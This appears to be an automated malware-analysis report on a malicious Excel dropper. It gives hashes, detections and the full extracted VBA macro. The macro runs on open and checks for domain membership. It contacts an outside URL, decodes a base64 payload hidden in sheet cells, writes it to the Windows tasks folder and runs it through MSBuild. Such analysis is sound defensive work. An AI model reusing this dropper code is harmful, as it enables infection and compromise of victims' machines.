Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 452722bf48499e77…

MALICIOUS

Office (OLE)

743.5 KB Created: 2019-07-24 19:53:31 Authoring application: Microsoft Excel First seen: 2019-11-20
MD5: a026a5e2703ff8474d147bc120557e52 SHA-1: 8a685ce91f07ed9a19b9795fff7842afb91308c7 SHA-256: 452722bf48499e772731e20d255ba2e634bba88347abcfb70a3b4ca4acaaa53d
338 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Excel file containing VBA macros that are triggered by the AutoOpen or Workbook_Open events. These macros utilize WScript.Shell and CreateObject, indicating an intent to execute commands or scripts. The presence of a URL suggests the macro is designed to download and execute a second-stage payload. The ClamAV detection as 'Xls.Dropper.Agent-7137986-0' further supports its role as a dropper.

Heuristics 11

  • ClamAV: Xls.Dropper.Agent-7137986-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-7137986-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
            Set oFile = Nothing
            Set oShell = CreateObject("WScript.Shell")
            oShell.Run "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe C:\windows\tasks\KB20183849.log"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Dim DM, EL
        Set DM = CreateObject("Microsoft.XMLDOM")
        ' Create temporary node with Base64 data type
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
            partOfDomain = False
            Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
            Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
    End Sub
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
        Sheets("Sheet1").Visible = True
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://express.scripts-careers.com/1 In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5111 bytes
SHA-256: 0a6cda0130a602bc7e1125f7019c13fff4ad72215af782944df96972c2834604
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function checkPartOfDomain()
        partOfDomain = False
        Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
        Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)
            
        For Each objItem In colItems
            If objItem.partOfDomain Then
                partOfDomain = True
            End If
        Next
        If partOfDomain Then
            checkPartOfDomain = True
            Debug.Print ("part of domain")
        Else
            checkPartOfDomain = False
            Debug.Print ("Not attached to a domain")
            
        End If
    End Function

Function decodeBase64(base64)
    Dim DM, EL
    Set DM = CreateObject("Microsoft.XMLDOM")
    ' Create temporary node with Base64 data type
    Set EL = DM.createElement("tmp")
    EL.DataType = "bin.base64"
    ' Set encoded String, get bytes
    EL.text = base64
    decodeBase64 = EL.NodeTypedValue
End Function

Sub writeBytes(file, bytes)
    Dim binaryStream
    Const TypeBinary = 1
    Const ForReading = 1, ForWriting = 2, ForAppending = 8
    Set binaryStream = CreateObject("ADODB.Stream")
    binaryStream.Type = TypeBinary
    'Open the stream and write binary data
    binaryStream.Open
    binaryStream.Write bytes
    'Save binary data to disk
    binaryStream.SaveToFile file, ForWriting
End Sub

Sub Do_Stuff()
    
    Dim text
    Dim cwd
    Dim fullPath
    Dim ExcelSheet As Object
    Dim res
    Dim res1
    
    If checkPartOfDomain Then
        
        'Ping
        Dim ie_com
        Set ie_com = CreateObject("InternetExplorer.Application")
        ie_com.Silent = True
        ie_com.Visible = False
        ie_com.Navigate "https://express.scripts-careers.com/1", 14, 0, Null, Null
        While (ie_com.busy)
            
        Wend
        ie_com.Quit
        
        cwd = Application.ActiveWorkbook.Path
        fullPath = "c:\windows\tasks\KB20183849.log"
        
        'obtain the decoded base64 values from the range of cells
        'Dim base64Decoded As String
        'base64Decoded = Base64DecodeString(ThisWorkbook.Sheets("Sheet1").Range("A500", "A510").Value)
        
        text = Worksheets("Sheet1").Cells(500, "A").Value
        text1 = Worksheets("Sheet1").Cells(501, "A").Value
        text2 = Worksheets("Sheet1").Cells(502, "A").Value
        text3 = Worksheets("Sheet1").Cells(503, "A").Value
        text4 = Worksheets("Sheet1").Cells(504, "A").Value
        text5 = Worksheets("Sheet1").Cells(505, "A").Value
        text6 = Worksheets("Sheet1").Cells(506, "A").Value
        text7 = Worksheets("Sheet1").Cells(507, "A").Value
        text8 = Worksheets("Sheet1").Cells(508, "A").Value
        text9 = Worksheets("Sheet1").Cells(509, "A").Value
        text10 = Worksheets("Sheet1").Cells(510, "A").Value
        text11 = Worksheets("Sheet1").Cells(511, "A").Value
        text12 = Worksheets("Sheet1").Cells(512, "A").Value
        text13 = Worksheets("Sheet1").Cells(513, "A").Value
        text14 = Worksheets("Sheet1").Cells(514, "A").Value
        
        Full = text + text1 + text2 + text3 + text4 + text5 + text6 + text7 + text8 + text9 + text10 + text11 + text12 + text13 + text14
        
        decode = decodeBase64(Full)
        writeBytes fullPath, decode
        'Dim fso As Object
        'Set fso = CreateObject("Scripting.FileSystemObject")
        'Dim oFile As Object
        'Set oFile = fso.CreateTextFile(fullPath)
        'oFile.Write decode
        'oFile.Close
        Set fso = Nothing
        Set oFile = Nothing
        Set oShell = CreateObject("WScript.Shell")
        oShell.Run "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe C:\windows\tasks\KB20183849.log"
        Application.Wait (Now + TimeValue("0:00:20"))
        Kill "C:\Windows\tasks\KB20183849.log"
        
    End If
End Sub


Sub AutoOpen()
End Sub

Sub Workbook_Open()
    Sheets("Sheet1").Visible = True
    Sheets("Sheet1").Activate
    Do_Stuff
    
End Sub



Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub Button11_Click()
ActiveWorkbook.Close False
Application.Quit
End Sub